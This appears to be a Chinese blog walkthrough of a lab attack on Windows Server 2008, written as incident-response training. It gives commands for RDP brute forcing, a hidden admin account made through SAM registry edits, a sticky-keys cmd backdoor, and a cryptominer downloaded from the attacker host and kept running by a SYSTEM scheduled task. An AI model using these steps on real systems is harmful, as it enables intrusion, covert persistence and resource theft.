渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序（靶机系统：Windows2008）

本次实验主要是为了应急响应打基础，从攻击者的角度出发，知己知彼，百战不殆

一、环境搭建

靶机： Windwos Server 2008 系统
靶机IP地址： 192.168.226.137

攻击IP地址： 192.168.226.1

二、模拟攻击

2.1 扫描端口

拿到目标IP首先使用nmap扫描，探测一下开放的端口

nmap -sS 192.168.226.137

发现目标系统的 3389 号端口开发

2.2 暴力破解 Administrator 密码

使用 hydra 工具爆破 Administrator 登录密码

hydra.exe -l Administrator  -P pass.txt rdp://192.168.226.137

使用爆破出的密码成功登录目标系统

2.3 权限维持—Windows系统隐藏账户

添加wxiaoge$隐藏账户并且添加进管理员组，首先执行以下命令

net user wxiaoge$ w123456! /add                  #添加wxiaoge$隐藏用户
net localgroup administrators wxiaoge$ /add    #将wxiaoge$用户添加进管理员组中

然后打开注册表编辑器，找到HKEY_LOCAL_MACHINE\SAM\SAM，点击右键，选择“权限”，将Administrator用户的权限，设置成“完全控制”，然后重新打开注册表，确保可以看到SAM路径下的文件。

找到HKEY_LOCAL_MACHINE\SAM\SAM，点击右键，选择“权限”

将Administrator用户的权限，设置成“完全控制”

重新打开注册表，确保可以看到SAM路径下的文件

之后，前往SAM/Domains/Account/Users/Names处，选择Administrator用户，在右侧的键值处可以找到对应的值如0x1f4，然后从左侧的Users目录下可以找到对应的文件。

然后从对应的000001F4文件中将键值对F的值复制出来。然后同理找到隐藏账户wxiaoge$所对应的文件，并将从Administrator文件中复制出来的F值粘贴进 wxiaoge $文件中。

最后将wxiaoge $ 和000003EB从注册表中右键导出，并删除wxiaoge$用户，然后将刚刚导出的两个文件重新导入进注册表中即可实现wxiaoge用户的隐藏。

导出：


删除 wxiaoge$ 账户，成功删除后，注册表中的000003EB、wxiaoge$都没有了

点击刚刚导出保存的 wxiaoge.reg和3EB.reg，点击之后会自动导入注册表

wxiaoge.reg和3EB.reg成功导入后，可以继续使用wxiag账户登录，之后验证后门账户，且成功登录

2.4 权限维持—shift粘贴键后门

1、粘滞键的启动程序在C盘的Windows/system32目录下为sethc.exe。所以我们打开注册表，定位到以下路径：
HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File ExecutionOption

2、在目录中新建一个sethc.exe的子项，并添加一个新键debugger，debugger的对应键值为cms的路径。
cmd路径：C:\Windows\system32\cmd.exe

2.5 植入WaKuang程序

将WaKuang程序放在本机的WWW目录下

让靶机通过浏览器下载到本地，浏览器地址 http://192.168.226.1/wkbd.zip

之后在靶机（windows server 2008）上解压wkbd.zip文件并且执行 javs.exe WaKuang程序

执行之后查看 出现如下弹窗，说明WaKuang程序已经成功运行

为了防止管理员将WaKuang程序 javs.exe给关闭，设置计划任务，每隔一分钟执行一次 javs.exe WaKuang程序

schtasks /create /tn system /sc minute /mo 1 /tr C:\Users\Administrator\Downloads\wkbd\wkbd\javs.exe  /ru system /f
#创建一个system计划任务，每一分钟执行一次javs.exe

至此，模拟实战结束，成功留了后门、WaKuang样本程序，相关靶场在我的资源和星球中可以下载

更多资源：
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球，可加入知识星球进行查看。也可搜索关注微信公众号：W小哥